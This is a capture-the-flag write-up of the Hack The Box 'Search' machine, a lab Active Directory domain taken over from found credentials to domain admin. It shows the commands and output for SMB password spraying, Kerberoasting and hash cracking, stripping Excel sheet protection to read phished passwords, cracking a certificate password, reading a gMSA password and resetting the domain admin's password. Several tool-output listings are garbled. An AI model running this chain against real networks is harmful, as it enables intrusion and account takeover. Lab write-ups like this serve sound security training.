htb-search

htb-search

Search was a classic Active Directory Windows box. It starts by finding credentials in an image on the website, which I’ll use to dump the LDAP for the domain, and find a Kerberoastable user. There’s more using pivoting, each time finding another clue, with spraying for password reuse, credentials in an Excel workbook, and access to a PowerShell web access protected by client certificates. With that initial shell, its a a few hops identified through Bloodhound, including recoving a GMSA password, to get to domain admin.

Enumeration

┌──(puck㉿kali)-[~/htb/search]
└─$ nmap -Pn -sV --script "ldap* and not brute*" -p 389 10.10.11.129
Starting Nmap 7.93 ( https://nmap.org ) at 2025-03-21 16:08 CET
Stats: 0:00:28 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.78% done; ETC: 16:08 (0:00:01 remaining)
Nmap scan report for 10.10.11.129
Host is up (0.0095s latency).

Bug in ldap-brute: no string output.
PORT    STATE SERVICE VERSION
389/tcp open  ldap    Microsoft Windows Active Directory LDAP (Domain: search.htb, Site: Default-First-Site-Name)
| ldap-rootdse: 
| LDAP Results
|   <ROOT>
|       domainFunctionality: 7
|       forestFunctionality: 7
|       domainControllerFunctionality: 7
|       rootDomainNamingContext: DC=search,DC=htb
|       ldapServiceName: search.htb:research$@SEARCH.HTB
|       isGlobalCatalogReady: TRUE
|       supportedSASLMechanisms: GSSAPI
|       supportedSASLMechanisms: GSS-SPNEGO
|       supportedSASLMechanisms: EXTERNAL
|       supportedSASLMechanisms: DIGEST-MD5
|       supportedLDAPVersion: 3
|       supportedLDAPVersion: 2
--snip--
|       supportedCapabilities: 1.2.840.113556.1.4.2237
|       subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=search,DC=htb
|       serverName: CN=RESEARCH,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=search,DC=htb
|       schemaNamingContext: CN=Schema,CN=Configuration,DC=search,DC=htb
|       namingContexts: DC=search,DC=htb
|       namingContexts: CN=Configuration,DC=search,DC=htb
|       namingContexts: CN=Schema,CN=Configuration,DC=search,DC=htb
|       namingContexts: DC=DomainDnsZones,DC=search,DC=htb
|       namingContexts: DC=ForestDnsZones,DC=search,DC=htb
|       isSynchronized: TRUE
|       highestCommittedUSN: 241860
|       dsServiceName: CN=NTDS Settings,CN=RESEARCH,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=search,DC=htb
|       dnsHostName: Research.search.htb
|       defaultNamingContext: DC=search,DC=htb
|       currentTime: 20250321151737.0Z
|_      configurationNamingContext: CN=Configuration,DC=search,DC=htb
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 555.37 seconds
                                                                                                                      
┌──(puck㉿kali)-[~/htb/search]

.


add 10.10.11.129 search.htb to /etc/hosts

If we look at the August 17 date, it says ‘Send password to Hope Sharp’ and password is mentioned IsolationIsKey? We have username and password of Hope user. We can perform password spaying on recently found accounts too.

Credential Brute Force

I have a name and a password from the image above. I’ll create a list of possible usernames from Hope Sharp in a file hope.txt:

hope
sharp
h.sharp
hope.s
hope.sharp
hopesharp

Now I can pass that to crackmapexec along with the password, and it finds a match:

┌──(puck㉿kali)-[~/htb/search]
└─$ nxc smb 10.10.11.129 -u hope.txt -p IsolationIsKey? --continue-on-success
SMB         10.10.11.129    445    RESEARCH         [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\hope:IsolationIsKey? STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\sharp:IsolationIsKey? STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\h.sharp:IsolationIsKey? STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\hope.s:IsolationIsKey? STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [+] search.htb\hope.sharp:IsolationIsKey? 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\hopesharp:IsolationIsKey? STATUS_LOGON_FAILURE 

Authenticated

There are a bunch of shares on the host:

┌──(puck㉿kali)-[~/htb/search]
└─$ smbmap -u hope.sharp -p IsolationIsKey? -H 10.10.11.129 --no-banner
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 10.10.11.129:445	Name: search.htb          	Status: Authenticated
    Disk                                                  	Permissions	Comment
    ----                                                  	-----------	-------
    ADMIN$                                            	NO ACCESS	Remote Admin
    C$                                                	NO ACCESS	Default share
    CertEnroll                                        	READ ONLY	Active Directory Certificate Services share
    helpdesk                                          	NO ACCESS	
    IPC$                                              	READ ONLY	Remote IPC
    NETLOGON                                          	READ ONLY	Logon server share 
    RedirectedFolders$                                	READ, WRITE	
    SYSVOL                                            	READ ONLY	Logon server share 

The CertEnroll share has some .crl files and other certificate related stuff that isn’t useful.

I am able to connect to helpdesk, but not list anything in it.

NETLOGON is empty.

RedirectedFolders$ has a bunch of users:

.

┌──(puck㉿kali)-[~/htb/search]
└─$ smbclient //10.10.11.129/RedirectedFolders$ -U hope.sharp --password=IsolationIsKey? 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  Dc        0  Fri Mar 21 16:53:13 2025
  ..                                 Dc        0  Fri Mar 21 16:53:13 2025
  abril.suarez                       Dc        0  Tue Apr  7 20:12:58 2020
  Angie.Duffy                        Dc        0  Fri Jul 31 15:11:32 2020
  Antony.Russo                       Dc        0  Fri Jul 31 14:35:32 2020
  belen.compton                      Dc        0  Tue Apr  7 20:32:31 2020
  Cameron.Melendez                   Dc        0  Fri Jul 31 14:37:36 2020
  chanel.bell                        Dc        0  Tue Apr  7 20:15:09 2020
  Claudia.Pugh                       Dc        0  Fri Jul 31 15:09:08 2020
  Cortez.Hickman                     Dc        0  Fri Jul 31 14:02:04 2020
  dax.santiago                       Dc        0  Tue Apr  7 20:20:08 2020
  Eddie.Stevens                      Dc        0  Fri Jul 31 13:55:34 2020
  edgar.jacobs                       Dc        0  Thu Apr  9 22:04:11 2020
  Edith.Walls                        Dc        0  Fri Jul 31 14:39:50 2020
  eve.galvan                         Dc        0  Tue Apr  7 20:23:13 2020
  frederick.cuevas                   Dc        0  Tue Apr  7 20:29:22 2020
  hope.sharp                         Dc        0  Thu Apr  9 16:34:41 2020
  jayla.roberts                      Dc        0  Tue Apr  7 20:07:00 2020
  Jordan.Gregory                     Dc        0  Fri Jul 31 15:01:06 2020
  payton.harmon                      Dc        0  Thu Apr  9 22:11:39 2020
  Reginald.Morton                    Dc        0  Fri Jul 31 13:44:32 2020
  santino.benjamin                   Dc        0  Tue Apr  7 20:10:25 2020
  Savanah.Velazquez                  Dc        0  Fri Jul 31 14:21:42 2020
  sierra.frye                        Dc        0  Thu Nov 18 02:01:46 2021
  trace.ryan                         Dc        0  Thu Apr  9 22:14:26 2020

        3246079 blocks of size 4096. 768625 blocks available
smb: \> 

I’m able to read files in hope.sharp’s dir:

smb: \> ls hope.sharp\
  .                                  Dc        0  Thu Apr  9 10:34:41 2020
  ..                                 Dc        0  Thu Apr  9 10:34:41 2020
  Desktop                           DRc        0  Thu Apr  9 10:35:49 2020
  Documents                         DRc        0  Thu Apr  9 10:35:50 2020
  Downloads                         DRc        0  Thu Apr  9 10:35:49 2020

                5085183 blocks of size 4096. 2165892 blocks available
smb: \> ls hope.sharp\Desktop\
  .                                 DRc        0  Thu Apr  9 10:35:49 2020
  ..                                DRc        0  Thu Apr  9 10:35:49 2020
  $RECYCLE.BIN                     DHSc        0  Thu Apr  9 10:35:49 2020
  desktop.ini                      AHSc      282  Thu Apr  9 10:35:00 2020
  Microsoft Edge.lnk                 Ac     1450  Thu Apr  9 10:35:38 2020

                5085183 blocks of size 4096. 2165892 blocks available

But not inside the other users:

smb: \> ls trace.ryan\
  .                                  Dc        0  Thu Apr  9 16:14:26 2020
  ..                                 Dc        0  Thu Apr  9 16:14:26 2020
  Desktop                           DRc        0  Fri Jul 31 07:40:32 2020
  Documents                         DRc        0  Fri Jul 31 07:40:32 2020
  Downloads                         DRc        0  Fri Jul 31 07:40:32 2020

                5085183 blocks of size 4096. 2165892 blocks available
smb: \> ls trace.ryan\Desktop\
NT_STATUS_ACCESS_DENIED listing \trace.ryan\Desktop\

I can get a list of users to potentially use down the road.

The SYSVOL share has standard stuff, but nothing that is useful.

LDAP – TCP 389

ldapdomaindump

I can scroll through this manually, but ldapdomaindump is a nice tool to visualize LDAP data. I’ll create a ldap directory for the output, and then run it:

puck@kali$ ldapdomaindump -u search.htb\\hope.sharp -p 'IsolationIsKey?' 10.10.11.129 -o ldap/
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

This creates a bunch of files in HTML, Json, and grepable formats:

puck@kali$ ls ldap/
domain_computers_by_os.html  domain_computers.json  domain_groups.json  domain_policy.json  domain_trusts.json          domain_users.html
domain_computers.grep        domain_groups.grep     domain_policy.grep  domain_trusts.grep  domain_users_by_group.html  domain_users.json
domain_computers.html        domain_groups.html     domain_policy.html  domain_trusts.html  domain_users.grep

There’s a bunch of information here. For one, the Tristan.Davies account is the domain administrator:

The description says “The only Domain Admin allowed, Administrator will soon be disabled”. This account seems like a target for later.

There’s a bunch of accounts labeled as “HelpDesk User” and different location-based helpdesk groups:

There’s another account, web_svc which is described as “Temp Account created by HelpDesk”:

 

Bloodhound

With creds I can run bloodhound.py against the domain. There’s a bunch of computer objects registered in AD that I can’t connect to, which results in a bunch of errors:

bloodhound-python -u Hope.Sharp -p ‘IsolationIsKey?’ -ns 10.10.11.129 -d search.htb -c All –zip

INFO: Found AD domain: search.htb
INFO: Connecting to LDAP server: research.search.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 113 computers
INFO: Connecting to LDAP server: research.search.htb
INFO: Found 106 users
INFO: Found 63 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
----------SNIP----------

We have a vhost, let’s add that to host file. Now we can use this dump to visualize it using bloodhound GUI.

puck@parrot-lt

sudo neo4j console

puck@parrot-lt

bloodhound

Upload all the dumped data.

This is the shortest path to domain admin. However, we don’t have access to any of the user who are member of ‘ITSEC’. We have access to ‘Hope Sharp’ user but she’s not a member of ITSEC. However, if we look for Kerberoastable Accounts, then we’d find two.


This ‘Web_svc’ account is created by HelpDesk and it is temporary. It is being used as Web Service, so basically it is a service account.

The SPN is not null, so we can Kerberoast to extract service account credentials (hash) from Active Directory as a regular user without sending any packets to the target system.

https://swarm.ptsecurity.com/kerberoasting-without-spns/

 

$\>

GetUserSPNs.py -request -dc-ip 10.10.11.129

 search.htb/Hope.Sharp:IsolationIsKey?
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation
ServicePrincipalName
Name MemberOf PasswordLastSet LastLogon
------- -------- -------------------------- ---------
2020-04-09 12:59:11.329031 <never>
Delegation
---------------------------------
---
-------
RESEARCH/web_svc.search.htb:60001
web_svc
$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$893ce4d4fcc86c204faebe423b7e32e2$688d48c511824

We got the hash of Web_svc service account. Let’s try to crack it.

$\>

hashcat -m 13100 web_svc_hash /usr/share/wordlists/rockyou.txt

hashcat (v6.1.1) starting...
--------SNIP--------
$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$e53619cf90ce49f28580953ec9f6ae63$13d69c419359f
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
--------SNIP--------

We got the password for web_svc service account, let’s spray this password across all the
accounts which we have found so far.

$\>

crackmapexec smb search.htb -u users.txt -p ‘@3ONEmillionbaby’ –continue-on-success

SMB
10.10.11.129
445
RESEARCH
[*] Windows 10.0 Build 17763 x64
(name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB
10.10.11.129
445 RESEARCH [-] search.htb\dave.simpson:@3ONEmillionbaby
445 RESEARCH [-] search.htb\Dax.Santiago:@3ONEmillionbaby
445 RESEARCH [-] search.htb\Keely.Lyons:@3ONEmillionbaby
445 RESEARCH [-] search.htb\Sierra.Frye:@3ONEmillionbaby
445 RESEARCH [-] search.htb\Kyla.Stewart:@3ONEmillionbaby
445 RESEARCH [-]
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE
SMB
10.10.11.129
search.htb\Chris.Stewart:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445 RESEARCH [-] search.htb\Ben.Thompson:@3ONEmillionbaby
445 RESEARCH [-]
STATUS_LOGON_FAILURE
SMB
10.10.11.129
search.htb\Kaiara.Spencer:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445 RESEARCH [-] search.htb\abril.suarez:@3ONEmillionbaby
445 RESEARCH [-] search.htb\Angie.Duffy:@3ONEmillionbaby
445 RESEARCH [-] search.htb\Antony.Russo:@3ONEmillionbaby
445 RESEARCH [-]
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE
SMB
10.10.11.129
search.htb\belen.compton:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445
RESEARCH
[-]
search.htb\Cameron.Melendez:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445 RESEARCH [-] search.htb\chanel.bell:@3ONEmillionbaby
445 RESEARCH [-] search.htb\Claudia.Pugh:@3ONEmillionbaby
445 RESEARCH [-]
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE
SMB
10.10.11.129
search.htb\Cortez.Hickman:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445 RESEARCH [-] search.htb\dax.santiago:@3ONEmillionbaby
445 RESEARCH [-]
STATUS_LOGON_FAILURE
SMB
10.10.11.129
search.htb\Eddie.Stevens:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [+] search.htb\edgar.jacobs:@3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Edith.Walls:@3ONEmillionbaby
445 RESEARCH [-] search.htb\eve.galvan:@3ONEmillionbaby
445 RESEARCH [-]
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE
SMB
10.10.11.129
search.htb\frederick.cuevas:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445 RESEARCH [-] search.htb\hope.sharp:@3ONEmillionbaby
445 RESEARCH [-]
STATUS_LOGON_FAILURE
SMB
10.10.11.129
search.htb\jayla.roberts:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445
RESEARCH
[-]
search.htb\Jordan.Gregory:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445
RESEARCH
[-]
search.htb\payton.harmon:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445
RESEARCH
[-]
search.htb\Reginald.Morton:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445
RESEARCH
[-]
search.htb\santino.benjamin:@3ONEmillionbaby STATUS_LOGON_FAILURESMB
10.10.11.129
445
RESEARCH
[-]
search.htb\Savanah.Velazquez:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445 RESEARCH [-] search.htb\sierra.frye:@3ONEmillionbaby
445 RESEARCH [-] search.htb\trace.ryan:@3ONEmillionbaby
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE

One user account is using the same password as service account. Let’s look into shares of that user.

$\>

smbclient //search.htb/RedirectedFolders$ -U edgar.jacobs

Enter WORKGROUP\edgar.jacobs's password:

@3ONEmillionbaby

Try "help" to get a list of possible commands.
smb: \> cd edgar.jacobs\Desktop\
smb: \edgar.jacobs\Desktop\> ls
. DRc 0 .. DRc 0 Mon Aug 10 10:02:16 2020
$RECYCLE.BIN DHSc 0 Thu Apr
desktop.ini AHSc 282 Microsoft Edge.lnk Ac 1450
Phishing_Attempt.xlsx Ac 23130
Mon Aug 10 10:02:16 2020
9 20:05:29 2020
Mon Aug 10 10:02:16 2020
Thu Apr
9 20:05:03 2020
Mon Aug 10 10:35:44 2020
3246079 blocks of size 4096. 458055 blocks available
smb: \edgar.jacobs\Desktop\> get Phishing_Attempt.xlsx

There’s a XLS file, download that to your machine.
This XLS document has two sheets, one of them has captured passwords of phishing and another
has a list of username. As you can see the lock symbol on second sheet, a column is being
locked with a password.You can confirm it by resizing the cell which is in between lastname and Username. There are
two ways to remove the password. Upload it on google drive and access it via sheets, it will
remove the password for you. This is the easiest way. If you want to remove it manually, then
you need unzip this xlsx file and delete the below link from the sheet2.xml file.
<sheetProtection algorithmName=”SHA-512″
hashValue=”hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg”
saltValue=”U9oZfaVCkz5jWdhs9AA8nA” spinCount=”100000″ sheet=”1″ objects=”1″ scenarios=”1″/>
You can find this ‘sheet2.xml’ file after unzipping the xlsx file. Location:
xl/worksheets/sheet2.xml Once you delete that line, you need to zip it back.
$\> zip -r Phishing.xls .
Open the xls file and double click on the line which is between D and B to see the passwords.

firstname lastname password Username
Payton Harmon ;;36!cried!INDIA!year!50;; Payton.Harmon
Cortez Hickman ..10-time-TALK-proud-66.. Cortez.Hickman
Bobby Wolf ??47^before^WORLD^surprise^91?? Bobby.Wolf
Margaret Robinson //51+mountain+DEAR+noise+83// Margaret.Robinson
Scarlett Parks ++47|building|WARSAW|gave|60++ Scarlett.Parks
Eliezer Jordan !!05_goes_SEVEN_offer_83!! Eliezer.Jordan
Hunter Kirby ~~27%when%VILLAGE%full%00~~ Hunter.Kirby
Sierra Frye $$49=wide=STRAIGHT=jordan=28$$18 Sierra.Frye
Annabelle Wells ==95~pass~QUIET~austria~77== Annabelle.Wells
Eve Galvan //61!banker!FANCY!measure!25// Eve.Galvan
Jeramiah Fritz ??40:student:MAYOR:been:66?? Jeramiah.Fritz
Abby Gonzalez &&75:major:RADIO:state:93&& Abby.Gonzalez
Joy Costa **30*venus*BALL*office*42** Joy.Costa
Vincent Sutton **24&moment&BRAZIL&members&66** Vincent.Sutton

Now we have 15 more username & passwords. If we look at the bloodhound visual path to domain
admin, out of all the users, there are only two are in the password list. Abby and Sierra will
lead to domain admin. The Abby password didn’t work, but Sierra’s did.

$\>

smbclient //search.htb/RedirectedFolders$ -U Sierra.Frye

Enter WORKGROUP\Sierra.Frye's password:

$$49=wide=STRAIGHT=jordan=28$$18

Try "help" to get a list of possible commands.
smb: \> cd sierra.frye\Desktop\
smb: \sierra.frye\Desktop\> ls
. DRc 0 .. DRc 0
Thu Nov 18 01:08:00 2021
Thu Nov 18 01:08:00 2021
$RECYCLE.BIN DHSc 0 Tue Apr
desktop.ini AHSc 282 Microsoft Edge.lnk Ac 1450 user.txt Ac 33
7 18:03:59 2020
Fri Jul 31 14:42:15 2020
Tue Apr
7 12:28:05 2020
Thu Nov 18 00:55:27 2021
3246079 blocks of size 4096. 459005 blocks available
smb: \sierra.frye\Desktop\> get user.txt
getting file \sierra.frye\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average
0.1 KiloBytes/sec)

We have user flag now.

smb: \sierra.frye\Downloads\Backups\> ls
. DHc 0 Mon Aug 10 20:39:17 2020
.. DHc 0 Mon Aug 10 20:39:17 2020
Ac 2643 Fri Jul 31 15:04:11 2020
search-RESEARCH-CA.p12staff.pfx
Ac
4326
Mon Aug 10 20:39:17 2020
3246079 blocks of size 4096. 458996 blocks available

Under Downloads we will find Cryptography files. Let’s download them to our machine.
A p12 file contains a digital certificate that uses PKCS#12 (Public Key Cryptography
Standard #12) encryption. It is used as a portable format for transferring personal private
keys and other sensitive information. P12 files are used by various security and encryption
programs. It is generally referred to as a “PFX file”.
We can try to upload this certificate to browser (firefox).
It asks for the password. We can try to crack the password using bellow tool.
GitHub – Ridter/p12tool: A simple Go script to brute force or parse a password-protected
PKCS#12 (PFX/P12) file.

$\>

./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt

█
Version: 1.0 (n/a) - 01/03/22 - Evi1cg
2022/01/03 02:34:13 -> [*] Brute forcing...
2022/01/03 02:34:13 -> [*] Start thread num 100
2022/01/03 03:01:44 -> [+] Password found ==> misspissy
2022/01/03 03:01:44 -> [*] Successfully cracked password after 5484391 attempts!

If you are on VM then it’d take much more time. Now we have the password for the certificate (misspissy)
Let’s add it in our browser.There’s a specific endpoint which you can access with this certificate.

https://search.htb/staff/

Now we need to input the credentials of ‘Sierra’ user ‘$$49=wide=STRAIGHT=jordan=28$$18’ and access PowerShell Console.

After login we can run Powershell commands.
Let’s go back to bloodhound and look for path from owned principle to domain admin.As we are member of ITSEC, we can read GMSA password.
BIR-ADFS-GMSA@SEARCH.HTB is a Group Managed Service Account. The group ITSEC@SEARCH.HTB can
retrieve the password for the GMSA BIR-ADFS-GMSA@SEARCH.HTB.

$\>

python3 gMSADumper.py -d search.htb -u ‘Sierra.Frye’ -p ‘$$49=wide=STRAIGHT=jordan=28$$18’

BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f

gMSAs use 240-byte, randomly generated complex passwords. So, it’s hard to crack.
PayloadsAllTheThings/Active Directory Attack.md at master · swisskyrepo/PayloadsAllTheThings
Passwordless PowerShell
GMSA Attributes in the Active Directory
msDS-GroupMSAMembership ( PrincipalsAllowedToRetrieveManagedPassword ) – stores the
security principals that can access the GMSA password.
msds-ManagedPassword – This attribute contains a BLOB with password information for
group-managed service accounts.
msDS-ManagedPasswordId – This constructed attribute contains the key identifier for the
current managed password data for a group MSA.
msDS-ManagedPasswordInterval – This attribute is used to retrieve the number of days
before a managed password is automatically changed for a group MSA.
Based on these both blogs, we can run commands as BIR-ADFS-GMSA to set an environment to access
domain admin
$user = ‘BIR-ADFS-GMSA$’
$gmsa = Get-ADServiceAccount -Identity $user -Properties ‘msDS-ManagedPassword’
$blob = $gmsa.’msDS-ManagedPassword’
$mp = ConvertFrom-ADManagedPasswordBlob $blob
$cred = New-Object System.Management.Automation.PSCredential $user,
$mp.SecureCurrentPassword
With these above we are setting up the GMSA password to be used and runas ‘BIR-ADFS-GMSA$’
user.

Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\Sierra.Frye\Documents> 

$user = ‘BIR-ADFS-GMSA$’

PS C:\Users\Sierra.Frye\Documents> 

$gmsa = Get-ADServiceAccount -Identity $user -Properties ‘msDS-ManagedPassword’

PS C:\Users\Sierra.Frye\Documents> 

$blob = $gmsa.’msDS-ManagedPassword’

PS C:\Users\Sierra.Frye\Documents> 

$mp = ConvertFrom-ADManagedPasswordBlob $blob

PS C:\Users\Sierra.Frye\Documents> 

$cred = New-Object System.Management.Automation.PSCredential $user, $mp.SecureCurrentPassword

PS C:\Users\Sierra.Frye\Documents> 

Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {whoami}

search\bir-adfs-gmsa$
PS C:\Users\Sierra.Frye\Documents>

 

Everything is set, now we need to invoke commands to run any type of script/command.
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {whoami}
For that we will use above command to know which user access we have right now.

$user = 'BIR-ADFS-GMSA$'
$gmsa = Get-ADServiceAccount -Identity $user -Properties 'msDS-ManagedPassword'
$blob = $gmsa.'msDS-ManagedPassword'
$mp = ConvertFrom-ADManagedPasswordBlob $blob
$cred = New-Object System.Managment.Automation.PSCredential $user, $mp.SecureCurrentPassword
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {whoami}

As you can see ‘whoami’ result is showing that we are ‘BIR-ADFS-GMSA$’ user, not ‘Sierra’.
Let’s look into Bloodhound one more time.Let’s look into help of ‘Generic all’.
As you can see ‘Generic All’ privileges simply means full control over ‘Tristan’ user, who is
also a domain admin. Let’s change the domain admin password.

Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {net user Tristan.Davies qwerty1234 /domain}Now we can access admin directory to read the root flag.

$\>

smbclient //search.htb/C$ -U Tristan.Davies

Enter WORKGROUP\Tristan.Davies's password:
Try "help" to get a list of possible commands.
smb: \> ls
$RECYCLE.BIN DHSc 0 Mon Mar 23 19:24:13 2020
Config.Msi DHSc 0 Thu Dec 16 17:08:46 2021
DHSrn 0 Sun Mar 22 23:46:47 2020
HelpDesk Dc 0 Tue Apr 14 10:24:23 2020
inetpub Dc 0 Mon Mar 23 07:20:20 2020
Documents and Settings
pagefile.sys
AHS 738197504
PerfLogs
Mon Jan
3 07:18:09 2022
Dc 0 Thu Jul 30 14:43:39 2020
DRc 0 Thu Dec 16 17:07:44 2021
Dc 0 Sat Sep 15 07:21:46 2018
DHcn 0 Tue Apr 14 10:24:03 2020
DHScn 0 Sun Mar 22 23:46:48 2020
Dc 0 Mon Jan
System Volume Information DHS 0 Tue Mar 31 14:13:38 2020
Users DRc 0 Tue Aug 11 07:45:30 2020
Dc 0 Mon Dec 20 08:10:02 2021
Program Files
Program Files (x86)
ProgramData
Recovery
RedirectedFolders
Windows
3 07:55:00 2022
3246079 blocks of size 4096. 534471 blocks available
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 34 as root.txt (0.1 KiloBytes/sec)
(average 0.1 KiloBytes/sec)

..